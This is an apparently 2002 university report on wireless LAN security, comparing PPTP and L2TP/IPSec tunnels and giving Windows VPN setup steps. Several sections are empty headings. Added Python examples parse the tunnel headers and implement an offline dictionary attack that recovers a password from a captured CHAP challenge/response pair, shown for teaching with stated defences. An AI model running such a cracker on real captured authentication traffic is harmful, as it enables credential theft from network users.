Security in Wireless LANs






Dipl.-Ing. Christian Ploninger









Security in Wireless LANs

By Christian Ploninger







Institute of Computer Networks

Vienna University of Technology


November 2002



Abstract






1 Network overview

1.1 Adding a WLAN to an existing Intranet Infrastructure

This scenario typically occurs when the computer network of an organization evolves.

Installing an additional WLAN to an existing Network Infrastructure

1.1.1 Using a separate WLAN-to-Intranet Gateway (Type A)



1.1.2 Using one central Gateway (Type B)




1.2 Stand-alone WLAN with Internet Connectivity


This scenario may take place in a small organization or at home.




















1.3 Tunnelling Protocols



Point-to-Point Tunneling Protocol (PPTP). PPTP allows IP, IPX, or NetBEUI traffic to be encrypted, and then encapsulated in an IP header to be sent across a corporate IP internetwork or a public IP internetwork such as the Internet.




Layer Two Tunneling Protocol (L2TP). L2TP allows IP, IPX, or NetBEUI traffic to be encapsulated (and, when combined with IPSec, encrypted) and then sent over any medium that supports point-to-point datagram delivery, such as IP, X.25, Frame Relay, or ATM. L2TP itself provides no encryption; that is the job of IPSec, as described in 1.3.2.


1.3.1 Point-to-Point Tunneling Protocol (PPTP)

PPTP is a Layer 2 protocol that encapsulates PPP frames in IP datagrams for transmission over an IP internetwork, such as the Internet. PPTP can be used for remote access and router-to-router VPN connections. PPTP is documented in RFC 2637.

The Point-to-Point Tunneling Protocol (PPTP) uses a TCP connection (port 1723) for tunnel maintenance and a modified version of Generic Routing Encapsulation (GRE) to encapsulate PPP frames for tunneled data. The payloads of the encapsulated PPP frames can be encrypted and/or compressed. Figure 6 shows the structure of a PPTP packet containing user data.


Figure 6. Structure of a PPTP packet containing user data


1.3.2 Layer Two Tunneling Protocol (L2TP)

L2TP is a combination of PPTP and Layer 2 Forwarding (L2F), a technology proposed by Cisco Systems, Inc. L2TP represents the best features of PPTP and L2F. L2TP encapsulates PPP frames to be sent over IP, X.25, Frame Relay, or Asynchronous Transfer Mode (ATM) networks. When configured to use IP as its datagram transport, L2TP can be used as a tunneling protocol over the Internet. L2TP is documented in RFC 2661.

L2TP over IP internetworks uses UDP (port 1701) and a series of L2TP messages for tunnel maintenance. L2TP also uses UDP to send L2TP-encapsulated PPP frames as the tunneled data. The payloads of encapsulated PPP frames can be encrypted and/or compressed. Figure 7 shows the structure of an L2TP packet containing user data.







Figure 7. Structure of an L2TP packet containing user data
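The two headers just described (enhanced GRE for PPTP, RFC 2637, and the L2TP header, RFC 2661) are small enough to parse by hand. The following parser is an added example and is not part of the original report; the sample packets at the bottom are constructed in the code rather than captured, and the PPP protocol table covers only the few protocol numbers these tunnels commonly carry. It checks the header bits a PPTP endpoint is required to reject (C, R, s and Recur must be zero, K must be set, version 1, protocol type 0x880B) and returns the PPP frame each tunnel carries, which is the part MPPE encrypts in PPTP and which, for L2TP/IPSec, goes inside ESP together with the whole UDP datagram.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# PPP protocol numbers these tunnels commonly carry (IANA assignments).
PPP_PROTOCOLS = {0x0021: "IP", 0xC021: "LCP", 0xC023: "PAP", 0xC223: "CHAP",
                 0x80FD: "CCP", 0x00FD: "compressed data (CCP/MPPE)"}
PPTP_GRE_PROTOCOL = 0x880B  # RFC 2637: protocol type for PPP inside enhanced GRE


@dataclass
class PppFrame:
    protocol: int
    payload: bytes

    @property
    def protocol_name(self) -> str:
        return PPP_PROTOCOLS.get(self.protocol, hex(self.protocol))


def parse_ppp(frame: bytes) -> PppFrame:
    """PPP as carried inside either tunnel: no HDLC flags or FCS; the
    address/control pair FF 03 may be present; the protocol field may be
    compressed to one byte (PFC) when its low bit is set."""
    if frame[:2] == b"\xff\x03":
        frame = frame[2:]
    if frame[0] & 1:
        return PppFrame(frame[0], frame[1:])
    return PppFrame(struct.unpack("!H", frame[:2])[0], frame[2:])


@dataclass
class PptpGre:
    call_id: int
    seq: Optional[int]
    ack: Optional[int]
    ppp: PppFrame


def parse_pptp_gre(pkt: bytes) -> PptpGre:
    """Enhanced GRE header (RFC 2637 section 4.1): what follows the IP header
    (IP protocol 47) of a PPTP packet carrying user data."""
    b0, b1, proto, length, call_id = struct.unpack("!BBHHH", pkt[:8])
    # b0: C R K S s Recur(3)    b1: A Flags(4) Ver(3)
    if b0 & 0xCF:                    # C, R, s and Recur must all be zero
        raise ValueError("reserved GRE bits set")
    if not b0 & 0x20:                # K: Call ID present (mandatory for PPTP)
        raise ValueError("key (Call ID) field missing")
    if b1 & 0x07 != 1 or proto != PPTP_GRE_PROTOCOL:
        raise ValueError("not enhanced GRE version 1 carrying PPP")
    off, seq, ack = 8, None, None
    if b0 & 0x10:                    # S: sequence number present
        seq = struct.unpack("!I", pkt[off:off + 4])[0]
        off += 4
    if b1 & 0x80:                    # A: acknowledgment number present
        ack = struct.unpack("!I", pkt[off:off + 4])[0]
        off += 4
    payload = pkt[off:off + length]  # Payload Length excludes the GRE header
    if len(payload) != length:
        raise ValueError("truncated payload")
    return PptpGre(call_id, seq, ack, parse_ppp(payload))


@dataclass
class L2tp:
    is_control: bool
    tunnel_id: int
    session_id: int
    ns: Optional[int]
    nr: Optional[int]
    ppp: Optional[PppFrame]          # None for control (tunnel maintenance) messages


def parse_l2tp(pkt: bytes) -> L2tp:
    """L2TP header (RFC 2661 section 3.1) as carried in UDP, port 1701."""
    b0, b1 = pkt[0], pkt[1]
    # b0: T L x x S x O P    b1: x x x x Ver(4)
    if b1 & 0x0F != 2:
        raise ValueError("not L2TP version 2")
    is_control = bool(b0 & 0x80)
    if is_control and not (b0 & 0x40 and b0 & 0x08):
        raise ValueError("control messages must carry Length and Ns/Nr")
    off, total = 2, len(pkt)
    if b0 & 0x40:                    # L: Length field present
        total = struct.unpack("!H", pkt[off:off + 2])[0]
        off += 2
    tunnel_id, session_id = struct.unpack("!HH", pkt[off:off + 4])
    off += 4
    ns = nr = None
    if b0 & 0x08:                    # S: Ns/Nr present
        ns, nr = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
    if b0 & 0x02:                    # O: Offset Size present, then that much padding
        off += 2 + struct.unpack("!H", pkt[off:off + 2])[0]
    body = pkt[off:total]
    return L2tp(is_control, tunnel_id, session_id, ns, nr,
                None if is_control else parse_ppp(body))


# Constructed sample packets (not captures). PPTP: K, S and A set, Call ID 1,
# seq 5, ack 4, an 8-byte PPP/IP payload. L2TP: data message with L and S set,
# tunnel 7, session 9, Ns 3, Nr 2, carrying a PPP CHAP packet.
PPTP_SAMPLE = (bytes([0x30, 0x81]) + struct.pack("!HHHII", PPTP_GRE_PROTOCOL, 8, 1, 5, 4)
               + b"\xff\x03\x00\x21" + b"\x45\x00\x00\x14")
L2TP_PPP = b"\xff\x03\xc2\x23" + b"\x01\x2a\x00\x04"
L2TP_SAMPLE = (bytes([0x48, 0x02]) + struct.pack("!HHHHH", 12 + len(L2TP_PPP), 7, 9, 3, 2)
               + L2TP_PPP)
```

Nothing in either header is authenticated: Call ID, Tunnel ID, Session ID and the sequence numbers are all plaintext. For PPTP the only protection is that the PPP payload is MPPE-encrypted; for L2TP/IPSec the whole UDP datagram, header included, is placed inside ESP (Figure 8).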

In Windows 2000, IPSec Encapsulating Security Payload (ESP) is used to encrypt the L2TP
packet. This is known as L2TP/IPSec. The result after applying ESP is shown in Figure 8.


Figure 8. Encryption of an L2TP packet with IPSec ESP

1.3.3 PPTP Compared to L2TP/IPSec

Both PPTP and L2TP/IPSec use PPP to provide an initial envelope for the data, and then append additional headers for transport through the internetwork. However, there are the following differences:



With PPTP, data encryption begins after the PPP connection process (and, therefore, PPP authentication) is completed. With L2TP/IPSec, data encryption begins before the PPP connection process by negotiating an IPSec security association.



PPTP connections use MPPE, a stream cipher based on the RC4 algorithm of RSA Data Security (RC4 is Ron Rivest's stream cipher, not the Rivest-Shamir-Adleman public-key algorithm), with 40-, 56-, or 128-bit encryption keys. Stream ciphers encrypt data as a bit stream. L2TP/IPSec connections use the Data Encryption Standard (DES), which is a block cipher that uses either a 56-bit key for DES or three 56-bit keys for 3DES. Block ciphers encrypt data in discrete blocks (64-bit blocks, in the case of DES). Of these options only 3DES is still regarded as an acceptable cipher: 40- and 56-bit keys and single DES are within reach of brute force, and RC4 has since been deprecated.



PPTP connections require only user-level authentication through a PPP-based authentication protocol. L2TP/IPSec connections require the same user-level authentication and, in addition, computer-level authentication using computer certificates.

1.3.4 Advantages of L2TP/IPSec over PPTP

The following are the advantages of using L2TP/IPSec over PPTP in Windows 2000:



IPSec provides per-packet data authentication (proof that the data was sent by the authorized user), data integrity (proof that the data was not modified in transit), replay protection (prevention from resending a stream of captured packets), and data confidentiality (prevention from interpreting captured packets without the encryption key). By contrast, PPTP provides only per-packet data confidentiality.



L2TP/IPSec connections provide stronger authentication by requiring both computer-level authentication through certificates and user-level authentication through a PPP authentication protocol.



PPP packets exchanged during user-level authentication are never sent in an unencrypted form because the PPP connection process for L2TP/IPSec occurs after the IPSec security associations (SAs) are established. If intercepted, the PPP authentication exchange for some types of PPP authentication protocols can be used to perform offline dictionary attacks and determine user passwords. By encrypting the PPP authentication exchange, offline dictionary attacks are only possible after the encrypted packets have been successfully decrypted.
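The offline dictionary attack mentioned above, as an added example that is not from the original report. It uses plain CHAP (RFC 1994, MD5-based) because Python's hashlib always provides MD5; Windows clients use MS-CHAP and MS-CHAPv2, whose response is derived from the MD4 NT hash with DES rather than MD5, but the attack has the same shape. The challenge, identifier, password and wordlist are constructed in the code, and the two constructed packets are what a sniffer on the WLAN would see when PPTP authenticates over the still-unencrypted PPP link.

```python
import hashlib
import struct
from typing import Iterable, Optional, Tuple

CHAP_CHALLENGE, CHAP_RESPONSE = 1, 2


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 section 4.1: Response = MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


def build_chap(code: int, identifier: int, value: bytes, name: bytes) -> bytes:
    """CHAP packet layout: Code, Identifier, Length, Value-Size, Value, Name."""
    body = bytes([len(value)]) + value + name
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def parse_chap(pkt: bytes) -> Tuple[int, int, bytes, bytes]:
    """Returns (code, identifier, value, name) of a Challenge or Response packet."""
    code, identifier, length = struct.unpack("!BBH", pkt[:4])
    if code not in (CHAP_CHALLENGE, CHAP_RESPONSE):
        raise ValueError("only Challenge/Response packets carry a Value")
    size = pkt[4]
    return code, identifier, pkt[5:5 + size], pkt[5 + size:length]


def crack(challenge_pkt: bytes, response_pkt: bytes,
          wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack on one captured Challenge/Response pair."""
    c_code, c_id, challenge, _server = parse_chap(challenge_pkt)
    r_code, r_id, response, _user = parse_chap(response_pkt)
    if (c_code, r_code) != (CHAP_CHALLENGE, CHAP_RESPONSE) or c_id != r_id:
        raise ValueError("packets are not a matching Challenge/Response pair")
    for candidate in wordlist:
        # One MD5 per guess; the server is never contacted, so nothing it does
        # (lockout, rate limiting) can slow this down.
        if chap_response(c_id, candidate, challenge) == response:
            return candidate
    return None


# Constructed "capture" (not real traffic): the password wlan2002 is the secret
# under attack; the attacker is assumed to know only the two packets.
_CHALLENGE = bytes.fromhex("0123456789abcdef0011223344556677")
CAPTURED_CHALLENGE_PKT = build_chap(CHAP_CHALLENGE, 0x2A, _CHALLENGE, b"vpnserver")
CAPTURED_RESPONSE_PKT = build_chap(CHAP_RESPONSE, 0x2A,
                                   chap_response(0x2A, b"wlan2002", _CHALLENGE), b"VPN")
WORDLIST = [b"password", b"vienna", b"123456", b"wlan2002", b"letmein"]


def recover_password() -> Optional[bytes]:
    return crack(CAPTURED_CHALLENGE_PKT, CAPTURED_RESPONSE_PKT, WORDLIST)
```

The only defences are an exchange the attacker cannot see (IPSec established first, as with L2TP/IPSec) or an authentication method that does not reduce to guessing the password, such as EAP-TLS with certificates; a short or dictionary password falls to this attack regardless of how the CHAP variant hashes it.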

1.3.5 Advantages of PPTP over L2TP/IPSec

The following are advantages of PPTP over L2TP/IPSec in Windows 2000:



PPTP does not require a certificate infrastructure. L2TP/IPSec requires a certificate infrastructure for issuing computer certificates to the VPN server computer (or other authenticating server) and all VPN client computers. (Windows 2000 can nevertheless be configured to use IPSec with a pre-shared key instead of certificates.)



PPTP can be used by computers running Windows XP, Windows 2000, Windows NT version 4.0, Windows Millennium Edition (ME), Windows 98, and Windows 95 with the Windows Dial-Up Networking 1.3 Performance & Security Update. L2TP/IPSec can only be used with Windows XP and Windows 2000 VPN clients, because only these clients support the L2TP protocol, IPSec, and the use of certificates. (Windows 2000 and Windows XP were the current Windows releases when this was written.)



PPTP clients and servers can be placed behind a network address translator (NAT) if the NAT has the appropriate editors for PPTP traffic. L2TP/IPSec-based VPN clients or servers cannot be placed behind a NAT, because Internet Key Exchange (IKE), the protocol used to negotiate SAs, and IPSec-protected traffic are not NAT-translatable: ESP packets carry no transport-layer port numbers that a port-translating NAT could rewrite. In other words, no NAT device may sit on the path between the two tunnel endpoints. (This limitation was later removed by IPSec NAT traversal, NAT-T, RFC 3947 and RFC 3948, which wraps IKE and ESP in UDP port 4500; later updates for Windows 2000 and Windows XP added support for it.)







1.4 Setting up DHCP

Setup the Server

Setup the Clients





















1.5 Setting up NAT









1.6 Setting up the Tunnel

1.6.1 VPN Server Setup

Setup VPN Connection:

With the Virtual private network (VPN) server option, the Routing and Remote Access server operates in the role of a VPN server supporting both remote access and router-to-router VPN connections. To configure a Windows 2000 VPN remote access server using the Virtual private network (VPN) server option in the Routing and Remote Access Server Setup Wizard, perform the following:


1. Click Start, point to Programs, point to Administrative Tools, and then click Routing and Remote Access.

2. Right-click your server name, and then click Configure and Enable Routing and Remote Access.

3. In the Welcome to the Routing and Remote Access Server Setup Wizard dialog box, click Next.

4. In the Common Configurations dialog box, click Remote access server and then click Next.

5. In the Remote Client Protocols dialog box, verify that all data protocols used by your VPN clients are present, and then click Next. (Ordinarily this will include TCP/IP.)

6. In Internet Connection, click the connection that corresponds to the interface connected to your Wireless LAN, and then click Next. You will only see the Internet Connection dialog box if you have more than one LAN connection.

7. In the Network Selection dialog box, click the connection that corresponds to the connection connected to your intranet, and then click Next. You will only see the Network Selection dialog box if you have more than two LAN connections.

8. In the IP Address Assignment dialog box, click Automatic if the remote access server should use DHCP to obtain IP addresses for VPN clients. Otherwise, click From a specified range of addresses and configure one or more static ranges of addresses. Click Next.

9. In the Managing Multiple Remote Access Servers dialog box, click No, I don't want to set up this server to use RADIUS now, and then click Next.

10. In the Completing the Routing and Remote Access Server Setup Wizard dialog box, click Finish.

11. Start the Routing and Remote Access service when prompted.























Add VPN User:

Add a new local user called “VPN” to the VPN server and set its dial-in option to grant remote access permission. Because this permission is already set by default, it is also necessary to check all other user accounts and revoke their dial-in permission, so that only the VPN account can connect through the tunnel.


Configure IPSec:



Secure VPN Connection:





1.6.2 VPN Client Setup




Setup VPN Connection:

If you have a small number of VPN remote access clients, you can manually configure VPN connections for each client. For Windows XP VPN clients, use the following instructions to create the VPN connection:


1. Click Start, click Control Panel, click Network and Internet Connections, and then click Network Connections.

2. Under Network Tasks, click Create a new connection, and then click Next.

3. Click Connect to the network at my workplace, and then click Next.

4. Click Virtual Private Network connection, and then click Next.

5. Type the name of the VPN connection, and then click Next.

6. Click Do not dial the initial connection. Click Next.

7. Type the IP address of the VPN server, and then click Next.

8. Click Anyone's use if you want this VPN connection to be available to all users who log on to this computer. Otherwise, click My use only. Click Next. You will only see this choice if the computer is a member of a domain.

9. Click Add a shortcut to my desktop. Click Finish.



In the Connect dialog box, type the user name and password that will be sent as your security credentials when you connect. If you want to save the password so that it does not have to be typed for each connection attempt, click Save this user name and password for the following users.

To make a VPN connection, click Connect.

To create a VPN connection on a computer running Windows 2000, double-click the Make New Connection icon in the Network Connections folder and select the Connect to a private network through the Internet connection type.




Configure IPSec:

Secure VPN Connection:





